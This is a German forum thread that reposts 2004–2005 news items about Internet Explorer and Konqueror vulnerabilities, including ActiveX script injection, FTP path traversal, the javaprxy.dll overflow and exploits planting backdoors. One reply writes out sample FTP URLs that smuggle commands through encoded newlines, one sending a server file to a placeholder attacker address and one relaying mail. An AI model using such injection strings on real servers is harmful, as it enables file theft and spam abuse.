Autor Thema: Schwachstellen im Microsoft Internet Explorer  (Gelesen 13702 mal)

0 Mitglieder und 2 Gäste betrachten dieses Thema.

Offline Jürgen

  • der Löter
  • User a.D.
  • ****
  • Beiträge: 4999
  • white LED trough prism - WTF is cyan?
Schwachstellen im Microsoft Internet Explorer
« am: 17 Dezember, 2004, 01:00 »
Die Sicherheitsspezialisten von Greyhat haben ein Advisory veröffentlicht, das auf eine Schwachstelle im Internet Explorer hinweist. Durch einen Fehler im ActiveX-Control DHTML Edit (dhtmled.ocx) lässt sich beliebiger HTML- und JavaScript-Code in eine dargestellte Web-Seite einschleusen. Das Control ist als "Safe for Scripting" markiert, sodass es sich via JavaScript fernsteuern lässt. Insbesondere ist es möglich via execScript() Skript-Code in andere Seiten einzuschleusen.

In einer Demo auf den Seiten von Greyhat lädt das Control die Startseite von Google und schleust JavaScript ein, um das Google-Cookie anzuzeigen. Prinzipiell hätte das Cookie auch an einen Angreifer übermittelt werden können. Ferner ist es möglich, den kompletten Inhalt einer Web-Seite zu überschreiben, ohne dass die angezeigte Adresse sich ändert.

Betrüger können Anwendern mit speziell präparierten Seiten quasi beliebig gefälschte gefälschte Web-Seiten unterschieben. Ein ähnliches Problem (Phishing mit Fenstern ) meldete heise Security vergangene Woche; dort waren aber auch andere Browser betroffen. Der nun entdeckte Fehler wurde für den Internet Explorer unter XP mit SP1 und SP2 bestätigt. Abhilfe schafft das Deaktivieren von ActiveX in der Internet Zone.

Das DHTML-Edit-Control war in der Vergangenheit schon mehrfach für Sicherheitslücken im Internet Explorer verantwortlich. Auch die zuletzt von http-equiv veröffentlichte Demo zum Austricksen des Pop-up-Blockers unter XP mit Service Pack 2 nutzt eine Schwachstelle darin aus.

Siehe dazu auch:

    * Security Advisory von Greyhat

(dab/c't)
Quelle mit Links:
http://www.heise.de/newsticker/meldung/54352
Kein Support per persönlicher Mitteilung!
Fragen gehören in's Forum.

Veränderungen stehen an. Dies ist der bisherige Stand:
28,x°,23.5°,19,2°,13°Ost
,1mØ Multifeed, mit Quattro LNBs; Multiswitches 4x 5/10(+x) - alle ohne Terrestrik und modifiziert für nur ein 12V DC Steckernetzteil (Verbrauch insgesamt 15 Watt)
1mØ mit DiSEqC 1.3/USALS als LNB2 an DVB-S2 STB, aktuell 30°W bis 55°O
1.) FM2A88X Extreme6+, A8-6600K (APU mit 4x 3,9 GHz und Radeon HD8570D), 16GB DDR3 1866, 128GB SSD, 3TB HDD, Win10 x64 Pro 1909 / 10.0.17763.107, Terratec T-Stick Plus (für DAB+), Idle Verbrauch ca. 35 Watt
2.) FM2A75 Pro 4, A8-5600K (APU mit 4x 3,6 GHz und Radeon HD7530D), 8GB DDR3 1600, 128GB SSD, 2TB HDD, Win10 x64 Pro, Idle Verbrauch ca. 45 Watt
3.) Raspberry Pi 512MB u.a. mit Raspbian
4.) GA-MA770-UD3, Phenom II x4 940, 8GB DDR2, Radeon HD6570, 2TiB, USB 3.0, 10 Pro x64 (+ XP Pro 32bit (nur noch offline)), Ubuntu 10.4 64bit, Cinergy S2 USB HD, NOXON DAB+ Stick, MovieBox Plus USB, ...

Samsung LE32B530 + Benq G2412HD @ HDMI 4:2; Tokaï LTL-2202B
XORO HRS-9200 CI+ (DVB-S2); XORO HRT-8720 (DVB-T2 HD)
Empfänger nur für FTA genutzt / ohne Abos
YAMAHA RX-V663 (AV-Receiver); marantz 7MKII; Philips SHP2700 ...
FritzBox 7590 mit VDSL2 50000

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Schwachstelle in FTP-Client des Internet Explorers
« Antwort #1 am: 04 Januar, 2005, 11:20 »
Nach Angaben des italienischen Sicherheitsspezialisten Albert Galicia können präparierte FTP-Server eine Schwachstelle im Internet Explorer ausnutzen, um Dateien in beliebige Verzeichnisse auf dem lokalen Rechner eines Anwenders zu schreiben. Ursache ist ein Fehler des in Microsofts Browser implementierten FTP-Clients, der vom Server übermittelte Pfadinformationen nicht vollständig filtert. Durch zusätzliche Angabe von "../" lässt sich so der Pfad zum Speicherort manipulieren. Laut Advisory soll dies aber nur funktionieren, wenn der Anwender die Datei über Drag&Drop oder per Rechtsklick und "Speichern als" auf seinen Rechner kopiert -- beim Doppelklick tritt das Problem nicht auf.

Unter Umständen können Angreifer durch den Fehler Systemdateien überschreiben oder Schadcode in das lokale System einschleusen. Allerdings ist immer eine Interaktion des Anwenders notwendig, da nur er einen Download anstoßen kann. Betroffen ist der Internet Explorer unter Windows 2000 mit SP4 und Windows XP mit Service Pack 1. Der Fehler ist in XP Service Pack 2 nicht mehr enthalten.

Quelle : www.heise.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Weitere Fehler in FTP-Komponenten von Web-Browsern
« Antwort #2 am: 05 Januar, 2005, 13:09 »
In den FTP-Komponenten der Web-Browser Konqueror und Internet Explorer sind Schwachstellen enthalten, mit denen sich über präparierte FTP-URLs (FTP://) Befehle auf einem FTP-Server ausführen lassen. Darüber hinaus ist es mit derartigen Links sogar möglich, Mails an SMTP-Server zu übergeben. Spammer könnten Web-Seiten so manipulieren, dass Besucher etwa beim Klick auf ein Bild eine Mail versenden.

Das Problem liegt in der fehlenden Filterung URL-kodierter Newline-Zeichen (%0a), sodass sich etwa FTP-Befehle in aufgebaute FTP-Sessions einschleusen lassen:
ftp://ftpuser:ftppass@server/directory%0aftp-befehl%0a
Im vorliegenden Beispiel ist noch eine Authentifizierung durch den Nutzer erforderlich. Laut Albert Galicia, Entdecker der Schwachstelle, lässt sich anschließend aber der Server mit beliebigen Kommandos steuern, sofern der Anwender auf einen Link klickt.

So veranlasst der Link


ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
den FTP-Server, eine auf ihm gespeicherte Datei an den Angreifer mit der IP-Adresse a,b,c,d zu senden. Zudem wäre das Löschen von Dateien möglich.

Da die FTP-Kommunikation eine gewisse Ähnlichkeit mit SMTP aufweist, funktioniert das Versenden von Mails mit bestimmten Links ebenfalls.

ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT
TO%3a%0d%0aDATA%0d%0aSubject%3a
hacked%0d%0aTo%3a user%40server%0d%0a%0d%0ahacked
%0d%0a.%0d%0a:victim@domain:25

Die Fehler sind seit dem 5. Dezember (Konqueror) beziehungsweise dem 7. Dezember (Internet Explorer) bekannt. Das KDE-Team hat ein Advisory veröffentlicht, das auf Patches für die vom Konqueror verwendete FTP-Komponente FTP kioslave unter KDE 3.2.3 und 3.3.2 hinweist. Die Linux-Distributoren haben bereits aktualisierte KDE-Pakete herausgegeben.

Für den Internet Explorer ist noch kein Update verfügbar, in Windows XP mit Service Pack 2 ist der Fehler aber nicht mehr enthalten. XP-Anwender mit Service Pack 1 sollten alsbald Service Pack 2 installieren, da dort bereits ein große Zahl nun aufgedeckter Fehler beseitigt ist. Allerdings öffnet man damit Sicherheitslücken, die unter SP1 nicht vorhanden sind. Anwender von Windows 2000 und XP-Anwender die aus bestimmten Gründen SP2 nicht installieren können, sollten einen alternativen Browser in Betracht ziehen.

Quelle : www.heise.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Der Sicherheitsdienstleister eEye hat nach eigenen Angaben Microsoft über zwei kritische Lücken im Internet Explorer und Outlook informiert. Der Ankündigung über kommende Sicherheitshinweise zufolge kann ein Angreifer damit ein Windows-System mit Schadcode infizieren oder unter seine Kontrolle bringen. Nähere Angaben dazu macht eEye nicht; es soll aber nur eine minimale Benutzerinteraktion notwendig sein. Details will der Dienstleister erst nach der Verfügbarkeit von Updates veröffentlichen. Betroffen sind die Standardinstallationen des Internet Explorer und von Outlook unter allen Versionen von Windows NT 4.0, 2000 und XP. Ob Windows Server 2003 verwundbar ist, wird derzeit noch geprüft.

US-Medienberichten zufolge untersucht Microsoft derzeit die Schwachstellen mit höchster Priorität, könne aber noch nicht sagen, wann Updates zur Verfügung stünden. Bislang habe man auch noch keine Meldungen erhalten, dass die Schwachstellen bereits ausgenutzt würden. Marc Maiffret von eEye hält allerdings das Risiko für Zero-Day-Exploits, also Angriffe auf Lücken, für die es noch keinen Patch gibt, für relativ hoch. In der Vergangenheit habe sich Microsoft beim Stopfen kritischer Löcher oftmals zu viel Zeit gelassen und die Kunden unnötigen Risiken ausgesetzt -- das müsse sich zukünftig verbessern.

Quelle und Links : http://www.heise.de/newsticker/meldung/58143

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Exploit für Lücke im Internet Explorer in Umlauf
« Antwort #4 am: 14 April, 2005, 06:48 »
Für die DHTML-Schwachstelle im Internet Explorer ist bereits der erste Exploit erschienen, der auf einem verwundbaren System eine Backdoor auf dem TCP-Port 28876 öffnet. Bereits beim Besuch einer Web-Seite -- ohne weitere Interaktion des Anwenders -- jubelt der Server dem Browser Schadcode unter, um die Hintertür zu installieren. Verbindet sich ein Angreifer etwa per Telnet auf den Port hat er darüber Zugriff auf eine Windows-Eingabeaufforderung. Ist das Opfer als Administrator auf dem System angemeldet gewesen, hat auch der Eindringling diese Rechte und kann fortan das System kontrollieren.

Bei einem Test der heise-Security-Redaktion auf einem Windows-XP-Rechner mit SP2 warnte beim Öffnen der Hintertür aber die eingebaute XP-Firewall. Die Meldung wies darauf hin, dass der Internet Explorer einen Port öffnen möchte. Ein argloser Anwender könnte dem zustimmen. Mit einem besser programmierten Exploit ließe sich diese Warnmeldung allerdings komplett umgehen. Zudem fand der Virenscanner im Browsercache Fragmente des im Exploit enthaltenen Shell-Codes und schlug ebenfalls Alarm. Anwender, auf deren Rechner keinerlei Schutzsoftware läuft, können nur noch durch einen Blick in die Liste der geöffneten Ports (netstat -a) feststellen, ob eine Backdoor aktiv ist. Der Backdoor-Prozess selbst ist in der Prozessliste als iexplorer.exe eingetragen.

Betroffen sind Windows XP mit SP1 und SP2, sowie Windows 2000 mit SP4. Abhilfe schafft die Installation des von Microsoft zur Verfügung gestellten Sicherheitsupdates oder das Abschalten von JavaScript und Popups.

Quelle und Links : http://www.heise.de/newsticker/meldung/58544

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Weitere Sicherheitslöcher im Internet Explorer
« Antwort #5 am: 17 Mai, 2005, 18:42 »
Die Sicherheitsfirma Eeye kündigt die Veröffentlichung einer Sicherheitsempfehlung an, die Details über eine schwerwiegende Schwachstelle im Internet Explorer enthalten soll. Auch Outlook soll davon betroffen sein. Standardinstallationen der Software unter Windows NT, 2000 und XP sollen ohne großes Zutun des Benutzers das Einschleusen und Ausführen von Programm-Code ermöglichen.

Microsoft wurde am 5. Mai über die entdeckte Sicherheitslücke informiert und hat sie bestätigt. Die Öffentlichkeit soll hingegen erst über die Details in Kenntnis gesetzt werden, wenn Microsoft ein Update oder eine Empfehlung veröffentlicht. Dieses Vorgehen entspricht der üblichen Politik von Eeye und anderen Sicherheitsfirmen. Damit soll vermieden werden, dass die Sicherheitslöcher ausgenutzt werden können, bevor Benutzer die Chance haben sie zu stopfen.

Zwei weitere bislang unveröffentlichte Schwachstellen wurden von Eeye bereits im März an Microsoft gemeldet. Obwohl in der Zwischenzeit zwei "Patch Days" (zweiter Dienstag im Monat) verstrichen sind, gibt es von Microsoft noch keine Updates oder Empfehlungen dazu. Beide Sicherheitslücken sollen ähnlich schwerwiegend sein wie die oben genannte.

Microsoft hat seit der Einführung der regelmäßigen Update-Tage bereits dreimal außer der Reihe wichtige Sicherheits-Updates für den Internet Explorer veröffentlicht. Erst kürzlich kündigte Microsoft an, man werde die monatlich erscheinenden "Security Bulletins" durch unregelmäßig veröffentlichte "Advisories" ergänzen . Die oben genannten Sicherheitslücken wären eine gute Gelegenheit, damit anzufangen.

Quelle : www.pcwelt.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Schwachstellen im Microsoft Internet Explorer
« Antwort #6 am: 30 Mai, 2005, 16:00 »
Der Sicherheitsdienstleister Security Focus und das französische Sicherheitsportal FRSIRT (früher K-Otic) berichten über mehrere Schwachstellen im Internet Explorer. Sie können mit speziell präparierten Web-Seiten genutzt werden, um den Internet Explorer zum Absturz zu bringen.

Die erste Schwachstelle besteht bei Web-Seiten mit einem speziell konstruierten "OBJECT"-Tag, bei dem sich zwei Seiten gegenseitig einbetten. Der Internet Explorer gerät dadurch in eine Endlos-Schleife und stürzt letztlich ab.

Die zweite Sicherheitslücke befindet sich in der Datei "jscript.dll". Bei Javascript-Events des Typs "onLoad" in entsprechend vorbereiteten HTML-Seiten stürzt der Internet Explorer ab. Dazu kann es genügen, eine ungültige Funktion aufzurufen.

Der dritte Schwachpunkt, der zu einem Absturz führen kann, ist in der Datei "urlmon.dll" enthalten. Hier führt das Hinzufügen einer präparierten Web-Adresse (URL) zur Sicherheitszone "eingeschränkte Sites" zum Absturz.

Betroffen ist in allen Fällen der Internet Explorer 6.0 mit Service Pack 2 (IE 6 SP2) sowie zum Teil auch ältere Versionen. Nach Angaben von Security Focus wurde die zweite der genannten Schwachstellen in früheren Versionen bereits behoben und taucht im IE 6 SP2 wieder auf. Das gleiche sagt FRSIRT über die dritte Schwachstelle.

Mozilla-Browser (Mozilla 1.7.8, Firefox 1.0.4, K-Meleon 0.8.2) und Opera 8.0 lassen sich von alledem nicht beeindrucken.

Quelle : www.pcwelt.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Fehler im Internet Explorer mit ungewissen Folgen
« Antwort #7 am: 30 Juni, 2005, 13:23 »
In einem Advisory warnt die östereichische Firma SEC Consult vor einem Fehler im Internet Explorer, der zumindest dessen Absturz, eventuell aber auch die Ausführung externen Codes zur Folge haben könnte.

Der Internet Explorer bietet die Möglichkeit, COM-Objekte analog zu ActiveX-Controls über das <object>-Tag einzubinden. SEC Consult hat bei Tests festgestellt, dass auf einem normalen Windows-XP-System wenigstens zwanzig COM-Objekte herumliegen, deren Aufruf unter bestimmten Bedingungen zum Absturz des Microsoft-Browsers führen kann. Dazu gehört javaprxy.dll, bei dem eine speziell präparierte Webseite einen Heap-Overflow herbeiführen kann. Da man dabei Einfluss auf den Inhalt des Registers eax nehmen kann, vermuten die Österreicher, man könnte eventuell einen Function Pointer überschreiben und damit eigenen Code ausführen.

Die Sicherheitsberater demonstrieren das Problem mit einem CGI-Script, das javaprxy.dll über dessen ClassID in einem Objekt-Tag mit 30.000 A-Zeichen aufruft. In Tests von heise Security stürzte dabei tatsächlich der Internet Explorer auf einem System mit Windows XP Service Pack 2 und allen aktuellen Patches ab. Wie Bernhard Müller von SEC Consult gegenüber heise Security erläuterte, kann Microsoft die Abstürze zwar nachvollziehen, sieht aber keine Gefahr, dass fremder Code zur Ausführung kommen könnte. Deshalb wolle Microsoft zwar demnächst die Behandlung von COM-Objekten robuster gestalten, aber kein Sicherheits-Update herausgeben.

Quelle und Links : http://www.heise.de/newsticker/meldung/61245

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Microsoft patcht Java-Loch des Internet Explorer
« Antwort #8 am: 06 Juli, 2005, 13:33 »
Gegen die vergangene Woche gemeldete Schwachstelle im Internet Explorer stellt Microsoft nun ein Update bereit. Durch einen Fehler im COM-Objekt Javaprxy.dll ist es einer präparierten Webseite möglich, volle Kontrolle über ein System zu erlangen -- zumindest wenn der Anwender als Administrator angemeldet ist. Es genügt dazu, dass der Anwender die Webseite aufruft.

Das COM-Objekt gehört zu Microsofts Java-Implementierung, die die Redmonder ohnehin nicht mehr unterstützen. So setzen sie mit diesem Patch kurzerhand das Kill Bit in der Registry, das dafür sorgt, dass es aus dem Internet Explorer heraus nicht mehr aufgerufen oder nachinstalliert werden kann. Das führt jedoch dazu, dass die Microsoft Java Virtual Machine unter Umständen nicht mehr funktioniert. Der Patch ist als Workaround aufgeführt, was darauf schließen lässt, dass Microsoft zu einem späteren Zeitpunkt einen Patch nachreichen will, der das Problem konsequenter angeht.

Bisher geht Microsoft mit diesem Sicherheitsloch noch sehr halbherzig um. Das Advisory ist auf keiner der zentralen Sicherheitsseiten verlinkt, das Update wird zumindest bisher nicht über den automatischen Update-Service angeboten und auch der neue Microsoft Baseline Security Analyzer 2.0 attestiert verwundbaren Rechnern, dass alles im grünen Bereich wäre. Angesichts der Tatsache, dass bereits funktionierende Exploits im Internet verfügbar sind, die sich recht einfach erweitern lassen, könnte sich diese Halbherzigkeit noch bitter rächen, wenn es beispielsweise einem Angreifer gelingen sollte, auf einer vielbesuchten Web-Seite Code zu platzieren, der einen Trojaner installiert.

Alle Benutzer des Internet Explorer sollten das Update deshalb baldmöglichst installieren. Ausgenommen sind lediglich neuere Systeme, auf denen Microsofts Java ohnehin nicht mehr installiert ist. Wer auf Microsofts Java angewiesen ist, sollte nur noch mit hohen Sicherheitseinstellungen im Internet surfen. Weitere Details zu den möglichen Workarounds liefert das bisher nur in Englisch verfügbare Advisory.

Quelle und Links : http://www.heise.de/newsticker/meldung/61445

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Web-Seiten attackieren Internet-Explorer-Nutzer
« Antwort #9 am: 15 Juli, 2005, 06:15 »
Nutzer des Internet Explorer, die den letzten IE-Patch von Microsoft nicht eingespielt haben, surfen gefährlich. Mittlerweile tauchen immer mehr Web-Seiten auf, die den Fehler in Microsofts Java-Implementierung ausnutzen, um Spyware oder Trojaner zu installieren. Dazu modifizieren die Kriminellen den öffentlich verfügbaren Exploit, indem sie eigenen Shell-Code einbauen, der beispielsweise ein Programm aus dem Netz nachlädt und ausführt. Einige Virenscanner erkennen manche Exploits bereits -- aber längst nicht alle. "Insgesamt ist die Erkennungsrate noch recht dürftig.", warnt Andreas Marx von AV-Test gegenüber heise Security.

Die Infektion des Rechners erfolgt ohne Zutun des Anwenders. Dieser muss dazu lediglich eine Web-Seite öffnen, die den Schadcode enthält. Aufpassen beim Surfen -- also das bewusste Vermeiden dubioser Seiten -- bietet keinen nennenswerten Schutz. Angreifer haben es bereits in der Vergangenheit immer wieder geschafft, in Server einzubrechen und ihren Unrat dort einzuschleusen. Besonders im Visier haben sie dabei derzeit Server, die nicht ausreichend aktualisierte PHP-Software einsetzen und damit leicht zu kapern sind. Aber auch gut gewartete Web-Sites können indirekt zur Viren-Schleuder werden. So gelang es beispielsweise letztes Jahr Kriminellen, einen Ad-Server der Falk-AG zu hacken. Die Folge war, dass unter anderem populäre Sites wie The Register Seiten mit "vergifteten Anzeigen" auslieferten und damit Systeme ihrer Besucher infizierten.

Wer es noch nicht getan hat, sollte deshalb schleunigst den Patch in MS-05-037 installieren. Vor allem Endanwender sollten dazu wenn möglich die automatische Update-Funktion von Windows so einstellen, dass neue Patches automatisch im Hintergrund heruntergeladen und installiert werden. Dies beeinträchtigt den normalen Internet-Zugang nicht wesentlich, da der Update-Mechanismus im Hintergrund mit niedriger Priorität läuft. Und die immer wieder auftauchenden Verdächtigungen, Microsoft spioniere im Zuge solcher automatisierter Updates Anwender aus, ließen sich bisher in keinem einzigen Fall erhärten.

In Firmen sorgen SUS- beziehungsweise WSUS-Server (Windows Server Update Services) dafür, dass nicht jeder Anwender die Patches einzeln herunterladen muss. Des Weiteren ermöglicht es der eigene Update-Server den Administratoren, die Updates vor der Freigabe zur Installation auf Produktionssystemen zunächst selbst auf Testsystemen auf mögliche Unverträglichkeiten mit eingesetzter Soft- oder Hardware zu testen. Der Patch in MS-05-037 setzt das Kill Bit auf eine Komponente von Microsofts Java-Implementierung und verhindert damit, dass diese aus dem Internet Explorer heraus aufgerufen wird. Wer also beispielsweise Web-Applikationen einsetzt, die Microsofts Java VM nutzen, sollte diese unbedingt vorher auf mögliche Probleme testen.

Quele und Links : http://www.heise.de/newsticker/meldung/61700

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline Warpi

  • Master Of Disaster
  • User a.D.
  • ****
  • Beiträge: 1733
Internet Explorer verschluckt sich an kaputten Bildern
« Antwort #10 am: 19 Juli, 2005, 05:58 »
Mit einer improvisierten Test-Suite hat Michal Zalewski mehrere Probleme in der Behandlung von kaputten Bildern durch den Internet Explorer aufgespürt. Mehrere seiner Testkandidaten bringen den Microsoft-Browser zum Absturz, bei mindestens einem vermutet er, dass sich darüber auch Code ausführen lassen könnte.

Auf Grund von schlechten Erfahrungen mit Microsofts Security-Team habe er sich nicht die Mühe gemacht, die Firma vorab zu benachrichtigen, sondern veröffentlicht den Sachverhalt und das Skript zur Erstellung der Bilder direkt. Insbesondere habe er keine Lust gehabt, die Zeit zu investieren, einen echten Exploit zu entwickeln. Das sei aber nach seiner Erfahrung notwendig, um Microsoft von der Ernsthaftigkeit eines Problems zu überzeugen.

So steht eine detaillierte Analyse der Probleme noch aus. Insbesondere betont Zalewski, dass er bislang nicht sonderlich intensiv gesucht habe. Deshalb würden weitere Tests mit dieser Suite höchstwahrscheinlich weitere Probleme zu Tage fördern. Bei Tests von heise Security führten auf einem System mit IE 6, Windows XP SP2 und allen aktuellen Patches drei der von Zalewski bereitgestellten Bilder zu einem sofortigen Crash des Browsers, während ein aktueller Firefox die Ausgabe jeweils mit einer Meldung verweigerte, dass das Bild Fehler enthalte.

Zalewski ist eine Art Enfant Terrible der Security-Szene, der mit unkonventionellen Methoden immer wieder Probleme aufdeckt und sich dabei nicht scheut, überall anzuecken. So hatte er sich im vergangenen Jahr den Zorn von Open-Source-Fanatikern zugezogen, als er mit einem ähnlichen Verfahren kaputte HTML-Seiten erstellt und dabei mehrere Fehler in Mozilla&Co aufgespürt hatte, während der Internet Explorer sich zunächst relativ unbeeindruckt zeigte. Wenig später wurde jedoch mit einer Variation seines mangleme-Skripts, das die Seiten mit den ungültigen Tags erstellte, der Pufferüberlauf bei der IFrame-Behandlung des Internet Explorer entdeckt, der dann als BOFRA Berühmtheit erlangte und Microsoft ziemlich ins Schwitzen brachte.

Quelle : www.heise.de
Mein Vdr / Audio/ Video / Homeserver

Intel Atom A330 Dualcore 2*1,6Ghz / 2 Gigabyte Ram
2 * 500 Gigabyte Samsung HDDS, Technisat Skystar2 DVBS
Ubuntu Jaunty Server, Vdr mit Webinterface, Openssh, Samba

2. Vdr
Pentium 3 / 1000 Mhz /  512 Mb Ram / Refurbished
1 * 200 Gigabyte Samsung HD, Technisat Skystar 2 DVBS
Ubuntu Karmic Server, Vdr mit Webinterface, Openssh, Samba

Asus Eee PC 1005P Netbook (Intel Atom N450 1.6GHz, 1GB RAM, 160GB HDD) Win 7 Starter, WarpIX Netbookremix + Ext. 500 GB 2.5 " HD

Videoschnitthardware
AMD Black Edition - AMD Phenom II X6, 6 x 3.2 GHz Prozessor, 8 GB DDR3 / 1600, 2 x Samsung 1TB, Nvidia Gt 240
Techno Trend S3200 , Windows 7 Homepremium / x64, Linux Mint Julia / x64

Die größte Fehlerquelle des PCS sitzt meist 30cm vor dem Bildschirm.

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Weiteres schweres Sicherheitsloch im Internet Explorer
« Antwort #11 am: 03 August, 2005, 10:00 »
Noch kein Patch verfügbar

Die Sicherheitsexperten von eEye haben eine weitere schwere Sicherheitslücke im Internet Explorer gefunden. Das Sicherheitsloch in Microsofts Browser erlaubt Angreifern die Ausführung beliebigen Programmcodes, so dass diese eine umfassende Kontrolle über ein fremdes System erlangen können.

In einem Vorab-Advisory berichtet eEye, dass die neu entdeckte Sicherheitslücke im Internet Explorer die Windows-Versionen 2000, XP sowie Windows Server 2003 betrifft. Nutzer von Windows XP mit Service Pack 2 scheinen von dem Problem nicht betroffen zu sein. Ansonsten wird das Sicherheitsrisiko von eEye als hoch eingestuft.

Noch fehlen weitere Details zu dem Sicherheitsloch, wozu auch Angaben dazu gehören, unter welchen Umständen das Sicherheitsleck zum Problem wird. Womöglich wird eEye erst dann weitere Details nennen, sobald ein Patch zur Abhilfe bereit steht. Dies könnte am nächsten planmäßigen Patch-Day von Microsoft am 9. August 2005 der Fall sein.

Quelle : www.golem.de

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
